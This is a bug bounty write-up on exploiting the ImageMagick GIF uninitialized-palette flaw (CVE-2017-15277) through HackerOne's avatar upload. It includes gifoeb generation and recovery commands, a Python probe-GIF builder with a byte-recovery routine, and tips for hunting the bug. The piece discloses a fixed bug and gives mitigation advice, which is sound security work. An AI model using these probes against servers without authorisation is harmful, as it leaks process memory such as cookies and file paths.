ImageMagick GIF coder vulnerability leads to memory disclosure (HackerOne)

Hello Friends

This is my first write-up, about a bug I discovered back in January; I hope you like it. :)

Around January 2018, I discovered a vulnerability known as the ImageMagick GIF exploit, found by Emil Lerner (Neex), https://github.com/neex.

Let me explain it briefly:

Explanation

“The ImageMagick GIF exploit (CVE-2017-15277) is a vulnerability which affects the outdated ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26: the GIF coder leaves the palette uninitialized when processing a GIF file that has neither a global nor a local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.”

In simpler words: in those outdated versions of ImageMagick and GraphicsMagick the GIF coder allocates a colour palette but never fills it when the GIF carries no colour table, so whatever the server process last left in that piece of heap memory becomes the colours of the converted image. You craft such a GIF, upload it anywhere the site processes images (avatars, previews, thumbnails), download the converted result and translate its pixel colours back into the bytes they came from. Most of what comes back is noise, but it sometimes contains readable strings from the process memory.

Also, for those who are new to bug bounty: ImageMagick is open-source software for displaying, converting and editing raster and vector image files. Many web applications use it to crop, resize and recolour uploaded images, and it supports a large number of image formats.

Let’s jump to the bug exploitation part:

  • I downloaded the Neex repository from https://github.com/neex/gifoeb.
  • Then I created many exploitable GIF files with the command ./gifoeb gen 512x512 dump.gif; you can give the output an extension such as .gif, .jpg, .tiff, .bmp and many more.
Exploitable Files
  • Then I tried to upload one of the exploitable files via the profile picture upload feature on HackerOne.

In response I got back an image of different reflected pixels, and I was like

  • Then I kept uploading exploitable files and downloading as many of the reflected pixel files as possible in GIF format.
  • Afterwards, I saved all the files in a previews folder.
  • Finally, I recovered the leaked bytes from all the files using this command:

for p in previews/*; do ./gifoeb recover $p | strings; done

As you can see, the uninitialized pixels recovered from the downloaded GIF files disclosed server memory: file system paths, OS information and more.
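The whole procedure above, together with the palette mechanism described under Explanation, as an added Python example that is not gifoeb's, ImageMagick's or the author's code: it builds a probe GIF with no colour table the way gifoeb gen does, walks the GIF block structure to confirm (or, on the defending side, reject) a file that has neither a global nor a local colour table, models the vulnerable coder looking every pixel index up in a palette it never initialised, and recovers the palette bytes from the rendered pixels the way gifoeb recover does. The rendering step is simulated: no ImageMagick is run, and LEFTOVER_HEAP is a constructed stand-in for the process memory, with an invented path rather than anything leaked from HackerOne. The function names and the 254-code CLEAR interval in the LZW writer are my own choices; gifoeb's real generator and its 512x512 default may differ.

```python
import re
import struct

PALETTE_SIZE = 256 * 3  # 256 RGB entries: the size of one GIF colour table

# Constructed stand-in for what an unfilled palette buffer might contain on a
# real server. The path is invented; this is not data leaked from any site.
LEFTOVER_HEAP = (b"\x00\x7f\x10" * 40
                 + b"/var/www/app/uploads/tmp/ (constructed sample) "
                 + b"\x91\x3a" * 400)[:PALETTE_SIZE]


def _lzw_literal(indices):
    """GIF LZW stream that stores every pixel as a literal 9-bit code (minimum
    code size 8) and emits CLEAR every 254 codes, so the decoder's table never
    grows to 10-bit codes. Returned as data sub-blocks plus the 0x00 terminator."""
    clear, end, out = 256, 257, bytearray()
    bits = nbits = 0

    def put(code):
        nonlocal bits, nbits
        bits |= code << nbits          # GIF packs codes LSB-first
        nbits += 9
        while nbits >= 8:
            out.append(bits & 0xFF)
            bits >>= 8
            nbits -= 8

    put(clear)
    for i, idx in enumerate(indices):
        if i and i % 254 == 0:
            put(clear)
        put(idx)
    put(end)
    if nbits:
        out.append(bits & 0xFF)
    blocks = bytearray()
    for i in range(0, len(out), 255):
        blocks.append(len(out[i:i + 255]))
        blocks += out[i:i + 255]
    return bytes(blocks) + b"\x00"


def build_probe_gif(width=256, height=3):
    """GIF89a with NO global and NO local colour table whose pixels cycle through
    every index 0..255, as gifoeb gen does. Returns (gif_bytes, indices)."""
    indices = [(y * width + x) & 0xFF for y in range(height) for x in range(width)]
    screen = b"GIF89a" + struct.pack("<HHBBB", width, height, 0x70, 0, 0)  # bit 7 clear: no GCT
    image = b"\x2C" + struct.pack("<HHHHB", 0, 0, width, height, 0x00)     # bit 7 clear: no LCT
    return screen + image + b"\x08" + _lzw_literal(indices) + b"\x3B", indices


def color_table_status(data):
    """Walk the GIF block structure and return (has_global, has_local).
    (False, False) is exactly the input that left the palette uninitialised."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    has_global, has_local, pos = bool(packed & 0x80), False, 13
    if has_global:
        pos += 3 << ((packed & 7) + 1)          # skip the global colour table
    while pos < len(data):
        block = data[pos]
        if block == 0x3B:                       # trailer
            break
        if block == 0x21:                       # extension: label, then sub-blocks
            pos += 2
        elif block == 0x2C:                     # image descriptor
            ipacked = data[pos + 9]
            pos += 10
            if ipacked & 0x80:
                has_local = True
                pos += 3 << ((ipacked & 7) + 1)  # skip the local colour table
            pos += 1                            # LZW minimum code size
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (block, pos))
        while data[pos]:                        # skip data sub-blocks
            pos += data[pos] + 1
        pos += 1
    return has_global, has_local


def simulate_vulnerable_render(indices, leftover_heap):
    """Model of the bug: the coder allocates a 768-byte palette, never fills it,
    and looks each pixel index up in it. Returns a list of (r, g, b) tuples."""
    palette = leftover_heap[:PALETTE_SIZE]
    return [tuple(palette[3 * i:3 * i + 3]) for i in indices]


def recover_palette(rendered, indices):
    """What gifoeb recover does with the downloaded preview: we chose the index
    of every pixel, so each RGB value hands back three bytes of the palette."""
    out = bytearray(PALETTE_SIZE)
    for idx, rgb in zip(indices, rendered):
        out[3 * idx:3 * idx + 3] = bytes(rgb)
    return bytes(out)


def printable_strings(blob, min_len=6):
    """The same filter as `strings`: runs of printable ASCII."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def demo():
    gif, indices = build_probe_gif()
    rendered = simulate_vulnerable_render(indices, LEFTOVER_HEAP)
    leaked = recover_palette(rendered, indices)
    return gif, leaked, printable_strings(leaked)


if __name__ == "__main__":
    probe, leaked, found = demo()
    open("probe.gif", "wb").write(probe)
    print(color_table_status(probe), found)
```

Running the block writes probe.gif, which color_table_status reports as (False, False); against a real target you would upload that file, decode the returned preview to RGB and pass it to recover_palette with the same indices. On the defending side the same walk is the cheap pre-filter: a GIF with no colour table at all has no legitimate way to be rendered and can be rejected before it reaches the image library.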

Report

I submitted this vulnerability to HackerOne’s own program (Security).

They classified the bug as memory leakage and rewarded me with $500, which was a huge motivation for me as my first bounty. Thanks to Jobert, Reed, Joystick, Dirk and Wvdv.

Thanks to Emil Lerner (neex) for finding this vulnerability in ImageMagick and publishing the repo on GitHub.

Impact

Depending on what the process that handles the upload has in memory, these ImageMagick GIF exploit files can leak e-mails, cookies, SQL queries, directory paths and more.

On HackerOne only OS and path information was leaked; the rest of the recovered bytes were unreadable memory contents.

Solution

It has now been fully mitigated: updating ImageMagick (and GraphicsMagick, where it is used) to the latest version on every server stops the leak. As defence in depth it is also worth converting uploads in a separate, sandboxed worker process, since the CVE text makes the point that the leak only matters when the library runs inside a process that holds interesting data.

Advice

  • In recent ImageMagick versions this is fixed: if you upload an exploitable file you simply get a black image back, and a black image leaks nothing.
  • Second, even if you do get reflected pixel files, check whether they actually disclose something. If all you get is garbage like {{{*a/!a^a;bb(b|}, please don’t report it unless you find readable strings such as server paths or other information leaks.
  • Third and finally, create image files with different resolutions and extensions, and pay more attention to grey pixels, which carry more information than saturated blue, green or red ones: a run of printable ASCII has all three bytes in a similar range, which renders as grey, while pointers and binary data give far-apart byte values and hence strong colours. Results differ from site to site and with the outdated ImageMagick version in use.

Timeline

6th Jan 2018 — Report submitted to Security Program (Hackerone)

7th Jan 2018 — Security team assessed and triaged the report

7th Jan 2018 — CVE-2017-15277 was attached to the report as a reference, since the underlying vulnerability was found by Emil Lerner (Neex).

20th Jan 2018 — $500 bounty awarded. My first bounty as well. Really made my day.

7th Feb 2018 — Report resolved.